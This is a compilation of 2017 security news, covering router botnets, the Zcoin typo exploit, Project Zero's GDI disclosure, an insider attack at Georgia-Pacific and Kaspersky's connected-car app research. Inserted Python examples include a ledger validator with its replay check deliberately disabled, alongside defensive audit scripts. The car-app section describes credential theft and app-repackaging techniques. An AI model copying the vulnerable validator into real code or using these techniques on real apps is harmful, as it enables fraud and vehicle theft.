Na routery se zapomíná

Když v roce 2014 dělala společnost Tripwire průzkum mezi IT a bezpečnostními experty ve Spojených státech a Velké Británii, dospěla k alarmujícím výsledkům: z téměř dvou tisíc respondentů 30 procent IT profesionálů a 46 procent zaměstnanců po instalaci a zapojení routeru nezměnilo jeho výchozí heslo.

Víc než polovina dotazovaných v průběhu užívání pravidelně neaktualizovala firmware routeru, takže zařízení nemohlo být chráněné případnými bezpečnostními záplatami. Polovina respondentů používala pro zabezpečení Wi-Fi sítí dnes již nedoporučovaný standard WPS, který usnadňuje útočníkům jejich snahu odhalit heslo směrovače bez ohledu na jeho složitost nebo délku.

Naprostá většina dotazovaných využívala jednoduché SOHO routery. Z výzkumu vyplynulo, že až 80 procent těchto routerů obsahuje bezpečnostní chyby a jsou lehce zneužitelné, například pro masivní DDoS útoky.

Známý je případ hackerské skupiny Lizard Squad, která na Vánoce 2014 vyřadila za pomoci desítek tisíc prolomených routerů z provozu stránky Xbox Live a PlayStation Network, a znemožnila tak mnoha lidem vyzkoušet si hry, které dostali pod stromeček.

Skupina Lizard Squad se přitom vyloženě specializuje na odhalování nezajištěných routerů s hesly z továrního nastavení a vytváří z nich síť robotů, kterou zneužívá k takovýmto masivním DDoS útokům.

Útoky jsou natolik sofistikované, že využívají i speciální malware, který hledá další routery v okolí a zkouší, zda používají výchozí nastavené heslo z továrního nastavení nebo hesla typu „admin / admin“ či „root / 12345“.

Infikovaný router tedy rozšiřuje nákazu dál a přispívá k nárůstu počtu zařízení zapojených do útočné sítě DDoS. Mezi takové druhy malwaru patří například Linux/Remaiten, před jehož novou verzí nedávno varoval Eset. Útočí na routery, gatewaye a bezdrátové přístupové body. Kombinuje funkcionality již známých škodlivých kódů Tsunami (Kaiten) a Gafgyt.

Chyba ve firmwaru...

Malware Remaiten dělá kontrolu náhodných IP adres na dostupnost služby Telnet, resp. zkouší, zda se mu povede k této službě přihlásit s některým z výchozích hesel používaných výrobci routerů.

Pokud uspěje, zkusí zjistit platformu zařízení (typicky MIPS nebo ARM) a podle ní nahraje na zařízení komponentu tzv. downloaderu, jehož úkolem je spustit opět platformově odpovídajícího botnet klienta z C&C serveru. Po jeho spuštění má operátor C&C serveru zařízení pod plnou kontrolou.

„Hlavní způsob, jak této hrozbě předejít, představuje upgrade firmwaru routeru na aktuální verzi, nepoužívat mnohdy triviální přednastavené přihlašovací jméno a heslo a rovněž je vhodné zvážit, zda je opravdu nutné mít povolené přihlašování k administračnímu rozhraní routeru z internetu,“ popisuje Miroslav Dvořák, technický ředitel Esetu.

Chyby ve firmwaru routerů jsou přitom poměrně běžné. Například v roce 2014 odhalil český národní bezpečnostní tým CSIRT.CZ chybu u pěti tisíc routerů, které obsahovaly zranitelnost „rom-0“.

Router díky ní umožňoval vyexportovat a stáhnout svoji konfiguraci v podobě binárního souboru. Součástí konfigurace byla i přístupová hesla k webovému administračnímu rozhraní.

Chyba spočívala v tom, že tento soubor bylo možné stáhnout, aniž předtím bylo vyžadováno zadání hesla. Stačilo pouze znát URL tohoto souboru. Při výchozím nastavení routeru bylo možné konfiguraci stáhnout dokonce i přes WAN rozhraní, tedy z celého internetu.

Pokud se útočník dostane k administračnímu rozhraní takového routeru, může snadno přesměrovat adresy. Místo zadaného webu se tak uživateli zobrazí informační panel s upozorněním, že si musí instalovat Flash Player. Místo něj si ale do počítače stáhne škodlivý malware.

Řešením je v tomto případě úplný zákaz přístupu na webovou administraci routeru z WAN rozhraní a povolení administrace jen z jedné konkrétní vnitřní IP adresy. Nelze totiž spoléhat pouze na to, že napadený počítač vyčistí antivir, zdroj dalších hrozeb by se mohl nadále skrývat v nezajištěném routeru, k němuž dosud nemá většina bezpečnostních aplikací žádný přístup.

Chování škodlivého kódu, který napadl router, se navíc může průběžně měnit. Útočníci mohou přesměrovávat vyhledávané internetové stránky na podvodné weby a pomocí takovýchto phishingových útoků získat přístup k on-line účtům uživatelů. Velký problém to může být zejména ve firmách.


A Typo in Zerocoin's Source Code helped Hackers Steal ZCoins worth $585,000
19.2.2017 Securityweek Hacking

Are you a programmer?
If yes, then you would know the actual pain of... "forgetting a semicolon," the hide and seek champion since 1958.
Typos annoy everyone. Remember how a hacker's typo stopped the biggest bank heist in history, saving $1 billion of Bangladesh Bank's money from being stolen.
But this time a typo in the Zerocoin source code cost the company more than $585,000 in losses.
The Zerocoin cryptocurrency protocol is designed to add true cryptographic anonymity to Zcoin transactions, taking full advantage of "zero-knowledge proofs" to ensure the complete financial privacy of users.
Zcoin announced Friday that "a typographical error on a single additional character" in the Zerocoin source code helped an attacker to steal 370,000 Zerocoin, which is over $585,000 at today's price.
"We estimate the attacker has created about 370,000 Zcoins which has been almost completely sold except for about 20,000+ Zcoin and absorbed on the market with a profit of around 410 BTC," the Zcoin team said.
The team said the bug was created due to one extra character left inside Zerocoin source code that allowed the unknown attacker to reuse his/her existing valid proofs to generate additional Zerocoin spend transactions.
In short, by initiating one transaction, the attacker received Zcoins multiple times over.
The Zerocoin team explicitly mentioned that the bug wasn't due to any weakness in its cryptographic protocol, and that the anonymity of Zcoin and its users has not been compromised.
"We knew we were being attacked when we saw that the total mint transactions did not match up with the total spend transactions," the team said. "If our total supply were not verifiable due to hidden amount transactions, we would not have been able to discover this bug."
According to the Zerocoin team, the attacker or group of attackers were very sophisticated in hiding their tracks, generating lots of exchange accounts and carefully spreading out deposits and withdrawals over several weeks.
The team is set to release an urgent fix within the next 24 hours. So, all pools and exchanges are advised to update their software as soon as the release is out.


An implementation bug in Zerocoin helped hackers steal ZCoins worth $585,000

19.2.2017 Securityaffairs Hacking

A hacker exploited an implementation bug in the source code of the Zerocoin currency scheme to steal ZCoins worth $585,000.
“Zerocoin is a project to fix a major weakness in Bitcoin: the lack of privacy guarantees we take for granted in using credit cards and cash,” reads the project’s description.

The Zerocoin cryptocurrency protocol is designed to make transactions anonymous, taking full advantage of “zero-knowledge proofs” to ensure the complete financial privacy of users.

According to an announcement published on the project website, the bug was exploited by a hacker to create Zerocoin spend transactions without a corresponding mint.

“Yesterday, our team found a bug in our implementation of Zerocoin. A typographical error on a single additional character in code allowed an attacker to create Zerocoin spend transactions without a corresponding mint.” reads the announcement. “We have identified the error and are pushing the fix urgently within the next 24 hours. We urge all pools and exchanges to update once the release is out.”

The implementation bug helped the hacker to steal 370,000 Zcoin, which corresponds to $585,000 at the current price. The bug consists of an extra character left inside the source code of the currency that allowed the hacker to reuse his/her existing valid proofs to generate additional Zcoin spend transactions.

“We estimate the attacker has created about 370,000 Zcoins which has been almost completely sold except for about 20,000+ Zcoin and absorbed on the market with a profit of around 410 BTC,” continues the announcement.

The team said the bug was created due to one extra character left inside Zerocoin source code that allowed the unknown attacker to reuse his/her existing valid proofs to generate additional Zerocoin spend transactions.

Due to the bug, the attacker was able to spend the Zcoins used in a single transaction multiple times.


Note that the Zerocoin protocol itself does not contain any weakness and the anonymity of the currency has not been compromised: it is purely an implementation bug, and the algorithms in the currency scheme have no problems.

“We knew we were being attacked when we saw that the total mint transactions did not match up with the total spend transactions,” the team said. “If our total supply were not verifiable due to hidden amount transactions, we would not have been able to discover this bug.”

The experts at the Zerocoin team believe the attacker spent a significant effort to hide their tracks by generating a large number of exchange accounts involved in several transactions over several weeks.

The development team has identified the implementation error and is pushing an update within the next 24 hours.

“We have identified the error and are pushing the fix urgently within the next 24 hours. We urge all pools and exchanges to update once the release is out.”
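Both articles above describe the same two facts: a validator that accepted a replayed, already-valid spend proof, and a supply audit (mints versus spends) that revealed the problem. The block below is an added example for this page, not Zcoin’s code, modelling a mint/spend ledger in simplified form. The zero-knowledge verification is replaced by a hash lookup against known commitments (an assumption), and the defect is modelled as a validator that verifies the proof but skips the serial-number check, so a captured spend can be replayed; the exact Zerocoin defect was a one-character error whose mechanism the page does not detail. The supply audit is the invariant the Zcoin team used to notice the attack.

```python
"""Simplified mint/spend ledger (added example, not Zcoin's implementation).

Mint: record a commitment and count one coin minted.
Spend: present a proof bound to some commitment plus a serial number that
must never have been accepted before. The proof check is a hash lookup,
a stand-in for real zero-knowledge verification (assumption). The modelled
bug: a validator that forgets the serial check accepts replayed spends.
"""
import hashlib
from dataclasses import dataclass, field


def _h(*parts: str) -> str:
    """Hash helper standing in for commitment/serial/proof derivation."""
    return hashlib.sha256("|".join(parts).encode()).hexdigest()


@dataclass
class Spend:
    serial: str   # derived from the coin secret; unique per coin
    proof: str    # constructed stand-in for the ZK spend proof


@dataclass
class Ledger:
    commitments: set = field(default_factory=set)
    spent_serials: set = field(default_factory=set)
    minted: int = 0
    spent: int = 0
    check_serials: bool = True   # False models the broken validator

    def mint(self, secret: str, randomness: str) -> str:
        commitment = _h("commit", secret, randomness)
        self.commitments.add(commitment)
        self.minted += 1
        return commitment

    def make_spend(self, secret: str, randomness: str) -> Spend:
        commitment = _h("commit", secret, randomness)
        return Spend(serial=_h("serial", secret), proof=_h("proof", commitment))

    def accept(self, spend: Spend) -> bool:
        # "Proof verification": the proof must be bound to a known commitment.
        if not any(_h("proof", c) == spend.proof for c in self.commitments):
            return False
        # The serial check is what makes a valid proof single-use.
        if self.check_serials:
            if spend.serial in self.spent_serials:
                return False
            self.spent_serials.add(spend.serial)
        self.spent += 1
        return True


def supply_audit(ledger: Ledger) -> dict:
    """Spends can never exceed mints; any excess is coin created from nothing."""
    return {
        "minted": ledger.minted,
        "spent": ledger.spent,
        "excess": max(0, ledger.spent - ledger.minted),
    }


if __name__ == "__main__":
    broken = Ledger(check_serials=False)
    broken.mint("secret-1", "rand-1")
    replay = broken.make_spend("secret-1", "rand-1")
    print([broken.accept(replay) for _ in range(3)], supply_audit(broken))
```

The audit function is the defender’s takeaway: a public mint and spend count makes inflation detectable regardless of how the validator failed, which is exactly why the team says hidden-amount transactions would have left the bug undiscovered.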


Microsoft failed to patch a flaw in GDI library, Google released a PoC exploit
19.2.2017 Securityaffairs Vulnerebility

Security experts at the Google Project Zero group have publicly disclosed a vulnerability affecting Microsoft’s Windows OS.
It has happened again: the hackers at Google Project Zero have publicly disclosed a vulnerability affecting Microsoft’s Windows operating systems, ranging from Windows Vista Service Pack 2 to the latest Windows 10, that had yet to be patched by the IT giant.

The experts also published a proof-of-concept exploit code.
In October, the experts at Google Project Zero publicly disclosed a critical Windows zero-day vulnerability ten days after reporting it to Microsoft.

According to Google, the reason for going public without waiting for a patch is that its experts have observed exploits for the flaw in the wild.

According to Google’s disclosure policy, when a flaw is being exploited in the wild Google publicly discloses it after seven days.

Back to the present, the experts at Project Zero publicly disclosed the flaw in Windows because Microsoft failed to patch it within the 90-day window given by Google.

The flaw affects Windows’ Graphics Device Interface (GDI) library; Google Project Zero member Mateusz Jurczyk reported it to the Microsoft Security Team on 9 June last year.

The impact of the vulnerability is serious: it affects any application that uses the GDI library. An attacker can exploit it to read sensitive data from the memory of the vulnerable system.

Microsoft addressed the flaw with a patch released on 15 June, but that update did not solve all the issues in the library, so the Project Zero experts reported it to Microsoft again with a proof-of-concept on 16 November.

“As a result, it is possible to disclose uninitialized or out-of-bounds heap bytes via pixel colors, in Internet Explorer and other GDI clients which allow the extraction of displayed image data back to the attacker,” states Jurczyk in the second report.

Three months have passed without a fix from Microsoft, so Google’s security experts released the details of the flaw to the public.

This implies that threat actors in the wild now can exploit the flaw in targeted attacks.

The good news, in this case, is that an attacker needs physical access to the target machine to exploit the vulnerability.

Recently Microsoft delayed this month’s Patch Tuesday by a month due to “a last-minute issue that could impact some customers and was not resolved in time for [Microsoft’s] planned updates” on 14th February.

Experts believe that the flaw in the GDI library will remain unpatched for almost a month, which means that attackers in the wild may exploit it in the meantime.


Google Discloses Windows Vulnerability That Microsoft Fails To Patch, Again!
18.2.2017 thehackernews Vulnerebility
Microsoft is once again facing embarrassment for not patching a vulnerability on time.
Yes, Google's Project Zero team has once again publicly disclosed a vulnerability (with POC exploit) affecting Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10 that had yet to be patched.
A few months back, the search engine giant disclosed a critical Windows vulnerability to the public just ten days after revealing the flaw to Microsoft.
However, this time Google revealed the vulnerability in Windows to the public after Microsoft failed to patch it within the 90-day window given by the company.
Google's Project Zero member Mateusz Jurczyk responsibly reported a vulnerability in Windows' Graphics Device Interface (GDI) library to Microsoft Security Team on the 9th of June last year.
The vulnerability affects any program that uses this library, and if exploited, could potentially allow hackers to steal information from memory.
While Microsoft released a patch for the vulnerability on 15th June, the company did not fix all the issues in the GDI library, forcing the Project Zero researcher to once again report it to Microsoft with a proof-of-concept on 16th of November.
"As a result, it is possible to disclose uninitialized or out-of-bounds heap bytes via pixel colors, in Internet Explorer and other GDI clients which allow the extraction of displayed image data back to the attacker," Jurczyk notes in the new report.
Now, after giving the three-month grace period to the company, Google released the details of the vulnerability to the public, including hackers and malicious actors.
Google Project Zero team routinely finds security holes in different software and calls on the affected software vendors to publicly disclose and patch bugs within 90 days of discovering them. If not, the company automatically makes the flaw along with its details public.
Although Windows users need not panic, as hackers will require physical access to the host machine to exploit the vulnerability, the Redmond giant will have to release an emergency patch before sophisticated exploits are developed.
Microsoft recently delayed this month's Patch Tuesday by a month due to "a last-minute issue that could impact some customers and was not resolved in time for [Microsoft's] planned updates" on 14th February.
So, if there is no expected emergency patch this month, this newly disclosed vulnerability will be left open for hackers for almost a month to exploit — just like we saw last time when Russian hackers actively exploited then-unpatched Windows kernel bug in the wild — which could put Windows users at potential risk.


Former employee hacked paper maker Georgia-Pacific and caused $1m damage
18.2.2017 securityaffairs Hacking

Servers at paper maker Georgia-Pacific were hacked by a former sysadmin who was arrested by the feds. The incident caused $1m in damage.
A system administrator, Brian Johnson (44) from Baton Rouge, Louisiana, has been jailed for hacking the control systems of his ex-employer.

Johnson had worked at paper maker Georgia-Pacific for years until Valentine’s Day 2014, when he left the company and started attacking it. The company produces paper towels and tissues; it has 200 facilities across the US and 35,000 employees.

Johnson kept his VPN connection to the systems at Georgia-Pacific active even after he left the company, and used it to access the servers, install his own software and interfere with the industrial control systems (ICS) in the plant.

The former sysadmin’s attack against the company lasted two weeks and caused roughly $1.1 million in damage.

The experts who investigated the incident focused their analysis on the timing of the attacks: the intrusion started right after the sysadmin was fired. On February 27, the FBI raided Johnson’s home and found a VPN connection into the company’s servers on his laptop.

A forensic investigation allowed law enforcement to collect evidence of the attack on the company server.

According to the indictment, Johnson pleaded guilty to hacking and willful damage charges.


Last week, the Louisiana district court put the overall damages caused by the man at $1,134,828 in losses and ordered him to repay that amount.

The man has to serve a sentence of 34 months in prison.

“This case is a powerful reminder of the very real threat and danger that businesses and individuals face from cyberattacks and other cyber-related criminal activity,” said United States Attorney Walt Green. “The best defense to these sorts of attacks includes security, training, and continued vigilance at the facility level.”
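The control that failed here is the offboarding step: a leaver’s VPN credential stayed usable for two weeks. The block below is an added example written for this page, not Georgia-Pacific’s tooling: it cross-checks a constructed HR roster export against a constructed VPN account export and flags leavers whose remote-access account is still enabled, leavers who logged in after their leave date, and VPN accounts that have no HR record at all. The usernames, dates and CSV column names are constructed.

```python
"""Offboarding cross-check: HR roster versus VPN accounts (added example,
not Georgia-Pacific's tooling). Both inputs are constructed CSV exports."""
import csv
import io
from datetime import date

# Constructed HR roster export: who works here and when leavers left.
HR_CSV = """username,status,leave_date
alice,active,
former.admin,terminated,2014-02-14
bob,active,
carol,terminated,2014-01-31
"""

# Constructed VPN appliance export: account state and last successful login.
VPN_CSV = """username,account_enabled,last_login
alice,true,2014-02-26
former.admin,true,2014-02-25
bob,true,2014-02-20
carol,false,2014-01-30
dave,true,2014-02-24
"""


def parse_csv(text: str) -> list:
    return list(csv.DictReader(io.StringIO(text)))


def _to_date(value: str):
    return date.fromisoformat(value) if value else None


def offboarding_findings(hr_rows: list, vpn_rows: list) -> list:
    """Return (username, reason) tuples for every remote-access discrepancy."""
    leavers = {
        r["username"]: _to_date(r["leave_date"])
        for r in hr_rows if r["status"] == "terminated"
    }
    known = {r["username"] for r in hr_rows}
    findings = []
    for r in vpn_rows:
        user = r["username"]
        enabled = r["account_enabled"].strip().lower() == "true"
        last_login = _to_date(r["last_login"])
        if user not in known:
            # Orphan credential: nobody in HR owns it, so nobody will offboard it.
            findings.append((user, "vpn account with no HR record"))
            continue
        left = leavers.get(user)
        if left is None:
            continue
        if enabled:
            findings.append((user, "vpn account still enabled after leave date"))
        if last_login and last_login > left:
            findings.append(
                (user, f"vpn login on {last_login} after leave date {left}")
            )
    return findings


def run_check(hr_csv: str = HR_CSV, vpn_csv: str = VPN_CSV) -> list:
    return offboarding_findings(parse_csv(hr_csv), parse_csv(vpn_csv))


if __name__ == "__main__":
    for user, reason in run_check():
        print(f"{user}: {reason}")
```

A login after the leave date is the finding that matters most for incident response, because it is evidence of use rather than merely exposure; the still-enabled and orphan-account findings are the hygiene items to close before they become that.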


Dissecting Malware
18.2.2017 Kaspersky Virus

There are just a handful of reverse engineers clustered at the very top of the information security profession. From March 30 through April 2, 2017, one of them — Principal Security Researcher at Kaspersky Lab Nicolas Brulez — will deliver a course on the subject he has been training people around the world on for 12 years, malware reverse engineering. You won’t be stumped for days on end by reversing challenges anymore, because you’ll take away from St. Maarten tricks and efficient moves to reverse faster.

At Kaspersky Lab’s SAS 2017, those who are trying to break into the next level of digital investigation and malware analysis will benefit greatly — the SAS team has prepared three dedicated courses. Students will find out how to hunt for rare samples, study link analysis to see hidden connections, and learn reverse engineering techniques to see how the malicious code actually works.

You can take advantage of these “surgical” studies if you’re a practitioner of malware research, do forensics or incident response, or deal with reversing in general. You need to know assembly language and how to use tools such as debuggers and disassemblers (IDA). If you were analyzing code 10 years ago, you’ll find it easy to jump back into reversing. The good thing about it is that the tools and techniques remain almost the same, so reverse engineers just have to adapt a little bit to new technologies. Join the training to make sure that the world hasn’t turned upside down while you were chilling.

Journey to the inside of famous malware

Each day the students will practice reverse engineering skills on samples from such malicious programs as Cloud Atlas, MiniDuke or Red October that can be applied to modern analysis. The course program will help you develop the following skills:

Unpacking malware manually

Packers have been around for more than 10 years. In all this time they have had just one aim: making malware analysis more difficult and time-consuming. As it is time which is crucially important for a researcher, unpacking samples quickly is the goal of Day 1 of the training. Be ready to unpack some of the “celebrities” of the malware universe.

Actual malware analysis

After Day 2 you will be able to perform static shellcode analysis using IDA as if you had never stopped doing it. You will quickly take the hashing algorithm from one sample’s code and easily re-implement it. Other exercises are included too, such as analyzing MiniDuke, which is written in assembly language and has an extremely small and unsuspicious file size.

Dissecting APTs

The last two days give you the chance to practice what you learned in the first two days. You will define the components of malware and observe its functions, investigating the way it communicates with C&C servers. Only an understanding of how malware works will allow an IT security expert to stop the infection.

Hardware requirements

Legitimate version of IDA Pro
Virtual Machine with Windows XP SP3 installed (to avoid compatibility issues)
OllyDbg
Python 2.7
PE Editor (e.g. LordPE or other)
Hex Editor (e.g. Hiew or other)
Import Reconstructor/fixer: Imprec, Universal Import Fixer 1.2
PEID
The class is limited to a maximum of 20 participants — so book a seat at sas.kaspersky.com to be sure you are on the list.


Mobile apps and stealing a connected car
18.2.2017 Kaspersky Mobil

The concept of a connected car, or a car equipped with Internet access, has been gaining popularity for the last several years. The case in point is not only multimedia systems (music, maps, and films are available on-board in modern luxury cars) but also car key systems in both literal and figurative senses. By using proprietary mobile apps, it is possible to get the GPS coordinates of a car, trace its route, open its doors, start its engine, and turn on its auxiliary devices. On the one hand, these are absolutely useful features used by millions of people, but on the other hand, if a car thief were to gain access to the mobile device that belongs to a victim that has the app installed, then would car theft not become a mere trifle?

In pursuing the answer to this question, we decided to figure out what an evildoer can do and how car owners can avoid possible predicaments related to this issue.

Potential Threats

It should be noted that car-controlling apps are quite popular – most popular brands release apps whose number of users is between several tens of thousands and several million people. As an example, several apps were listed with their total number of installations.


For our experiments, we took several apps that control cars from various manufacturers. We will not disclose the app titles, but we should note that we notified the manufacturers of our findings throughout our research.

We reviewed the following aspects of each app:

Availability of potentially dangerous features, which basically means whether it is possible to steal a car or incapacitate one of its systems by using the app;
Whether the developers of an app employed means to complicate reverse engineering of the app (obfuscation or packing). If not, then it won’t be hard for an evildoer to read the app code, find its vulnerabilities, and take advantage of them to get through to the car’s infrastructure;
Whether the app checks for root permissions on the device (and refuses to run if they are detected). After all, if malware manages to infect a rooted device, then the malware will be capable of doing virtually anything. In this case, it is important to find out whether the developers let user credentials be saved on the device as plain text;
Whether there is verification that it is the GUI of the app that is displayed to the user (overlay protection). Android allows monitoring of which app is displayed to the user, and malware can intercept this event by showing a phishing window with an identical GUI to the user and steal, for instance, the user’s credentials;
Availability of an integrity check in the app, i.e., whether it verifies itself for changes within its code or not. This affects, for example, the ability of a malefactor to inject his code into the app and then publish it in the app store, keeping the same functionality and features of the original app.
Unfortunately, all of the apps turned out to be vulnerable to attacks in one way or another.

Testing the Car Apps

For this study, we took seven of the most popular apps from well-known brands and tested the apps for vulnerabilities that can be used by malefactors to gain access to a car’s infrastructure.

The results of the test are shown in the summary table below. Additionally, we reviewed the security features of each of the apps.

| App | App features | App code obfuscation | Unencrypted username and password | Overlay protection for app window | Detection of root permissions | App integrity check |
|-----|--------------|----------------------|-----------------------------------|-----------------------------------|-------------------------------|---------------------|
| App #1 | Door unlock | No | Yes (login) | No | No | No |
| App #2 | Door unlock | No | Yes (login & password) | No | No | No |
| App #3 | Door unlock; engine start | No | – | No | No | No |
| App #4 | Door unlock | No | Yes (login) | No | No | No |
| App #5 | Door unlock; engine start | No | Yes (login) | No | No | No |
| App #6 | Door unlock; engine start | No | Yes (login) | No | No | No |
| App #7 | Door unlock; engine start | No | Yes (login & password) | No | No | No |
App #1

The whole car registration process boils down to entering a user login and password as well as the car’s VIN into the app. Afterwards, the app shows a PIN that has to be entered with conventional methods inside the car so as to finalize the procedure of linking the smartphone to the car. This means that knowing the VIN is not enough to unlock the doors of the car.

The app does not check if the device is rooted and stores the username for the service along with the VIN of the car in the accounts.xml file as plain text. If a Trojan has superuser access on the linked smartphone, then stealing the data will be quite easy.

App #1 can be easily decompiled, and the code can be read and understood. Besides that, it does not counter the overlapping of its own GUI, which means that a username and password can be obtained by a phishing app whose code may have only 50 lines. It should be enough to check which app is currently running and launch a malicious Activity with a similar GUI if the app has a target package name.

In order to check for integrity verification, we modified the loginWithCredentials method.


In this case, a username and password will simply be shown on the screen of a smartphone, but nothing prevents embedding a code to send credentials to a criminal’s server.

The absence of integrity verification allows any interested individual to take the app, modify it at his own discretion, and begin distributing it among potential victims. Signature verification is sorely lacking. There is no doubt that such an attack will require an evildoer to make some effort – a user has to be conned into downloading the modified version of the app. Despite that, the attack is quite surreptitious in nature, so the user will not notice anything out of the ordinary until his car has been stolen.

What is nice, however, is that the app pulls SSL certificates to create a connection. All in all, this is reasonable enough, as this prevents man-in-the-middle attacks.

App #2

The app offers to save user credentials but at the same time recommends encrypting the whole device as a precaution against theft. This is fair enough, but we are not going to steal the phone – we are just “infecting” it. As a result, there is the same trouble as found in App #1: the username and password are stored as plain text in the prefs file.{?????????}.xml (the question marks represent random characters generated by the app).

The VIN is stored in another file.

The farther we go, the more we get. The developers did not even find time to implement integrity verification of the app code, and, for some reason, they also forgot about obfuscation. As a consequence of that, we easily managed to modify the LoginActivity code.


Thus, the app preserved its own functionality. However, the username and password that had been entered during registration were displayed on the screen immediately after a login attempt.

App #3

Cars paired to this app are optionally supplied with a control module that can start the engine and unlock the doors. Every module installed by the dealer has a sticker with an access code, which is handed over to the car owner. This is why it is not possible to link the car to other credentials, even if its VIN is known.

Still, there are other attack possibilities: first, the app is tiny, as its APK size amounts to 180 kilobytes; second, the entire app logs its debugging data to a file, which is saved on an SD card.

Logging at the start of LoginActivity

The location for dumping the log file

It’s a bit of bad luck that logging is enabled only when the following flag is set in the app: android:debuggable="true". The public version of the app does not have the flag for obvious reasons, but nothing can stop us from inserting it into the app. To do that, we shall use the Apktool utility. After launching the edited app and attempting to log in, a marcsApp folder with a TXT file appears on the SD card of the device. In our case, the username and password of the account have been written into that file.


Of course, persuading the victim to remove the original app and install an identical one with the debugging flag is not that easy. Nevertheless, this shuffling can be performed, for example, by luring the victim to a website where the edited app and installation manual can be downloaded as a critical update. Empirically, virus writers are good at employing social engineering methods such as this one. Now, it isn’t a big deal to add to the app the ability to send a log file to a designated server or a phone number as an SMS message.
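Two of the review criteria listed earlier (plain-text credentials on the device) and the App #3 finding above (the android:debuggable flag) reduce to file inspection once a package has been decoded with apktool. The block below is an added example written for this page, not Kaspersky’s tooling: it checks a decoded AndroidManifest.xml for android:debuggable="true" and scans shared_prefs XML files for credential-like keys stored in the clear. The manifest, the preference files, the package name, the VIN value and the list of sensitive key patterns are all constructed; the android XML namespace URI is the real one.

```python
"""Static checks over decoded APK files (added example, not Kaspersky's tooling).

Checks: (1) android:debuggable="true" in AndroidManifest.xml, which turns on
verbose logging in apps like App #3; (2) shared_prefs XML entries whose key
names look like credentials or vehicle identifiers stored as plain text.
All inputs below are constructed; only the android namespace URI is real.
"""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed decoded manifest (package name is an assumption).
MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.carapp">
  <application android:label="CarApp" android:debuggable="true">
    <activity android:name=".LoginActivity"/>
  </application>
</manifest>"""

# Constructed shared_prefs files; the VIN is a placeholder, not a real vehicle.
PREFS = {
    "accounts.xml": """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
  <string name="login">owner@example.invalid</string>
  <string name="vin">VIN-PLACEHOLDER-0001</string>
  <int name="launch_count" value="3"/>
</map>""",
    "credentials.xml": """<map><string name="password">hunter2</string></map>""",
    "ui.xml": """<map><boolean name="dark_mode" value="true"/></map>""",
}

# Key-name patterns treated as sensitive (assumption; extend per app).
SENSITIVE_KEY = re.compile(r"(pass|pwd|secret|token|login|user|vin)", re.I)


def is_debuggable(manifest_xml: str) -> bool:
    """True when <application> carries android:debuggable="true"."""
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    app = root.find("application")
    if app is None:
        return False
    return app.get(f"{{{ANDROID_NS}}}debuggable", "false").lower() == "true"


def plaintext_secret_keys(prefs: dict) -> list:
    """(file, key) pairs for string entries whose key name looks sensitive.

    Only <string> entries with a non-empty body are reported: those are values
    stored as-is, not booleans or counters."""
    hits = []
    for fname, xml_text in prefs.items():
        root = ET.fromstring(xml_text.encode("utf-8"))
        for elem in root.iter("string"):
            key = elem.get("name", "")
            if SENSITIVE_KEY.search(key) and (elem.text or "").strip():
                hits.append((fname, key))
    return sorted(hits)


def audit(manifest_xml: str, prefs: dict) -> dict:
    return {
        "debuggable": is_debuggable(manifest_xml),
        "plaintext_keys": plaintext_secret_keys(prefs),
    }


if __name__ == "__main__":
    print(audit(MANIFEST, PREFS))
```

Run against a real decoded package, the same two functions give a quick first pass on the "unencrypted username and password" column of the summary table; they say nothing about obfuscation, overlay protection or integrity checks, which need code-level review.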

App #4

The app allows binding of the existing VIN to any credentials, but the service will certainly send a request to the in-dash computer of the car. Therefore, unsophisticated VIN theft will not be conducive to hacking the car.

However, the tested app is defenseless against overlays on its window. If, owing to that, an evildoer obtains the username and password for the system, then he will be able to unlock the doors of the car.

Regretfully enough, the app stores the username for the system as well as a plethora of other interesting data, such as the car’s make, the VIN, and the car’s number, as clear text. All of these are located in the MyCachingStrategy.xml file.

App #5

In order to link a car to a smartphone that has the app installed, it is necessary to know the PIN that will be displayed by the in-dash computer of the car. This means that, just like in the case with the previous app, knowing the VIN is not enough; the car must be accessed from the inside.

App #6

This is an app made by Russian developers, which is conceptually different from its counterparts in that the car owner’s phone number is used as authorization. This approach creates a fair degree of risk for any car owner: to initiate an attack, just one Android API function has to be executed to gain possession of the username for the system.

App #7

For the last app that we reviewed, it must be noted that the username and password are stored as plain text in the credentials.xml file.


If a smartphone is successfully infected with a Trojan that has superuser permissions, then nothing will hinder the effortless theft of this file.

Opportunities for Car Theft

Theoretically, after stealing credentials, an evildoer will be able to gain control of the car, but this does not mean that the criminal is capable of simply driving off with it. The thing is, a key is needed for a car in order for it to start moving. Therefore, after accessing the inside of a car, car thieves use a programming unit to write a new key into the car’s on-board system. Now, let us recall that almost all of the described apps allow for the doors to be unlocked, that is, deactivation of the car’s alarm system. Thus, an evildoer can covertly and quickly perform all of the actions in order to steal a car without breaking or drilling anything.

Also, the risks should not be limited to mere car theft. Accessing the car and deliberate tampering with its elements may lead to road accidents, injuries, or death.

None of the reviewed apps has defense mechanisms. Due credit should be given to the app developers though: it is a very good thing that none of the aforementioned apps uses voice or SMS channels to control a car. Nonetheless, these exact methods are used by aftermarket alarm-system manufacturers, including Russian ones. On the one hand, this fact does not come as a surprise, as the quality of mobile Internet does not always allow cars to stay connected everywhere, while voice calls and SMS messages are always available, since they are basic functions. On the other hand, this creates additional car security threats, which we will now review.

Voice control is handled with so-called DTMF commands. The owner literally has to call up the car, and the alarm system responds to the incoming call with a pleasant female voice, reports the car status, and then switches to standby mode, where the system waits for commands from the owner. Then, it is enough to dial preset numbers on the keypad of the phone to command the car to unlock the doors and start the engine. The alarm system recognizes those codes and executes the proper command.

Developers of such systems have taken care of security by providing a whitelist for phone numbers that have permission to control the car. However, nobody imagined a situation where the phone of the owner is compromised. This means that it is enough for a malefactor to infect the smartphone of a victim with an unsophisticated app that calls up the alarm system on behalf of the victim. If the speakers and screen are disabled at the same time, then it is possible to take full command of the car, unbeknownst to the victim.

Certainly though, not everything is as simple as it seems at first glance. For example, many car enthusiasts save the alarm-system number under a made-up name, meaning a successful attack requires the victim to interact with the car frequently via calls. Only this way can an evildoer who has stolen the history of outgoing calls find the car number in the victim’s contacts.

